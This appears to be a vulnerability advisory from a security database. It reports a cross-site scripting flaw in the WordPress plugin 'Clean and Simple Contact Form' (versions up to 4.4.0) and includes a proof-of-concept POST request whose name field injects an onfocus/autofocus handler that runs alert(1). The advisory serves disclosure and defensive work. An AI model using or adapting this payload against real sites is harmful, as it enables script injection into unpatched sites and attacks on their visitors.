WordPress Clean And Simple Contact Form 4.4.0 XSS

2014.11.05
Credit: Ajin Abraham
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Author : Ajin Abraham Author Website: http://opensecurity.in Affected Product: WordPress Clean and Simple Contact Form Affected Version: <= 4.4.0 Vendor: Meg Nicholas Vendor URL: http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/ WP Plugin URL: https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/ PoC: Make a POST request to the page containing the contact form generated by "Clean and Simple Contact Form" with the POST DATA as cscf[name]=" onfocus=alert(1) autofocus x=" POST http://localhost/contact-us/ cscf[name]=" onfocus=alert(1) autofocus x=" *Regards,Ajin*

References:

http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top